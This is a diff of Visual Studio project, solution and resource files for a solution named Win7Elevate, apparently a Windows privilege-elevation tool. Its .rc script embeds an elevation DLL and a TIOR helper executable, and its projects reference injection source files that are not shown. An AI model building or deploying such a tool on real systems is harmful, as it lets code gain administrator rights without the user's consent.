<TargetName>$(ProjectName)64</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\CMMN.cpp" />
|
||||
<ClCompile Include="..\Redirector.cpp" />
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TIOR.cpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,39 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="targetver.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TIOR.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\CMMN.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\Redirector.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,3 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
</Project>
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// TIOR.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,16 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
|
||||
|
||||
|
||||
// TODO: reference additional headers your program requires here
|
||||
#include <assert.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,60 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 11.00
|
||||
# Visual Studio 2010
|
||||
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
||||
ProjectSection(SolutionItems) = preProject
|
||||
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
||||
EndProjectSection
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TIOR", "TIOR\TIOR.vcxproj", "{B36517F4-984C-422C-ADF9-85D5ACD4E30B}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7ElevateDll", "Win7ElevateDll\Win7ElevateDll.vcxproj", "{A1814C92-4DA6-440C-811E-86016AB7433A}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\Win7Elevate.vcxproj", "{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}"
|
||||
ProjectSection(ProjectDependencies) = postProject
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A} = {A1814C92-4DA6-440C-811E-86016AB7433A}
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B} = {B36517F4-984C-422C-ADF9-85D5ACD4E30B}
|
||||
EndProjectSection
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
|
||||
Debug|Win32 = Debug|Win32
|
||||
Debug|x64 = Debug|x64
|
||||
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
|
||||
Release|Win32 = Release|Win32
|
||||
Release|x64 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,18 @@
|
|||
//{{NO_DEPENDENCIES}}
|
||||
// Microsoft Visual C++ generated include file.
|
||||
// Used by Win7Elevate.rc
|
||||
//
|
||||
#define IDD_EMBEDDED_DLL 110
|
||||
#define IDD_EMBEDDED_TIOR 111
|
||||
|
||||
// Next default values for new objects
|
||||
//
|
||||
#ifdef APSTUDIO_INVOKED
|
||||
#ifndef APSTUDIO_READONLY_SYMBOLS
|
||||
#define _APS_NO_MFC 1
|
||||
#define _APS_NEXT_RESOURCE_VALUE 139
|
||||
#define _APS_NEXT_COMMAND_VALUE 32771
|
||||
#define _APS_NEXT_CONTROL_VALUE 1000
|
||||
#define _APS_NEXT_SYMED_VALUE 111
|
||||
#endif
|
||||
#endif
|
Binary file not shown.
|
@ -0,0 +1,82 @@
|
|||
// Microsoft Visual C++ generated resource script.
|
||||
//
|
||||
#include "resource.h"
|
||||
|
||||
#define APSTUDIO_READONLY_SYMBOLS
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// Generated from the TEXTINCLUDE 2 resource.
|
||||
//
|
||||
#ifndef APSTUDIO_INVOKED
|
||||
#include "targetver.h"
|
||||
#endif
|
||||
#define APSTUDIO_HIDDEN_SYMBOLS
|
||||
#include "windows.h"
|
||||
#undef APSTUDIO_HIDDEN_SYMBOLS
|
||||
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
#undef APSTUDIO_READONLY_SYMBOLS
|
||||
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
// English (U.S.) resources
|
||||
|
||||
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
|
||||
#ifdef _WIN32
|
||||
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
|
||||
#pragma code_page(1252)
|
||||
#endif //_WIN32
|
||||
|
||||
#ifdef APSTUDIO_INVOKED
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// TEXTINCLUDE
|
||||
//
|
||||
|
||||
1 TEXTINCLUDE
|
||||
BEGIN
|
||||
"resource.h\0"
|
||||
END
|
||||
|
||||
2 TEXTINCLUDE
|
||||
BEGIN
|
||||
"#ifndef APSTUDIO_INVOKED\r\n"
|
||||
"#include ""targetver.h""\r\n"
|
||||
"#endif\r\n"
|
||||
"#define APSTUDIO_HIDDEN_SYMBOLS\r\n"
|
||||
"#include ""windows.h""\r\n"
|
||||
"#undef APSTUDIO_HIDDEN_SYMBOLS\r\0"
|
||||
END
|
||||
|
||||
3 TEXTINCLUDE
|
||||
BEGIN
|
||||
"#include ""Win7Elevate.rc2\0"
|
||||
END
|
||||
|
||||
#endif // APSTUDIO_INVOKED
|
||||
|
||||
#endif // English (U.S.) resources
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
|
||||
|
||||
#ifdef _DEBUG
|
||||
|
||||
#ifdef _WIN64
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
|
||||
#else
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
|
||||
#endif
|
||||
|
||||
#else // _DEBUG
|
||||
|
||||
#ifdef _WIN64
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
|
||||
#else
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
|
||||
#endif
|
||||
|
||||
#endif
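Review bot: The `3 TEXTINCLUDE` entry is missing its closing doubled quote: `"#include ""Win7Elevate.rc2\0"` yields an `#include` with an unterminated file name, unlike the `""targetver.h""` and `""windows.h""` entries in block 2. If the intent is to pull hand-written resources in from an .rc2, the entry would read `"#include ""Win7Elevate.rc2""\r\n"` followed by `"\0"`. The `IDD_EMBEDDED_DLL` / `IDD_EMBEDDED_TIOR` BINARY statements at the end of the file are also placed in the generated .rc itself rather than in that .rc2, so saving from the resource editor may rewrite or drop them. Whether a Win7Elevate.rc2 is part of this commit is not visible from this section.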
|
|
@ -0,0 +1,212 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>Win7Elevate</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<MinimalRebuild>false</MinimalRebuild>
|
||||
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<MinimalRebuild>false</MinimalRebuild>
|
||||
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
<ResourceCompile>
|
||||
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ResourceCompile>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
<ResourceCompile>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ResourceCompile>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Resource.h" />
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
<ClInclude Include="Win7Elevate_Inject.h" />
|
||||
<ClInclude Include="Win7Elevate_Utils.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\CMMN.cpp" />
|
||||
<ClCompile Include="..\Redirector.cpp" />
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate.cpp" />
|
||||
<ClCompile Include="Win7Elevate_Inject.cpp" />
|
||||
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ResourceCompile Include="Win7Elevate.rc" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
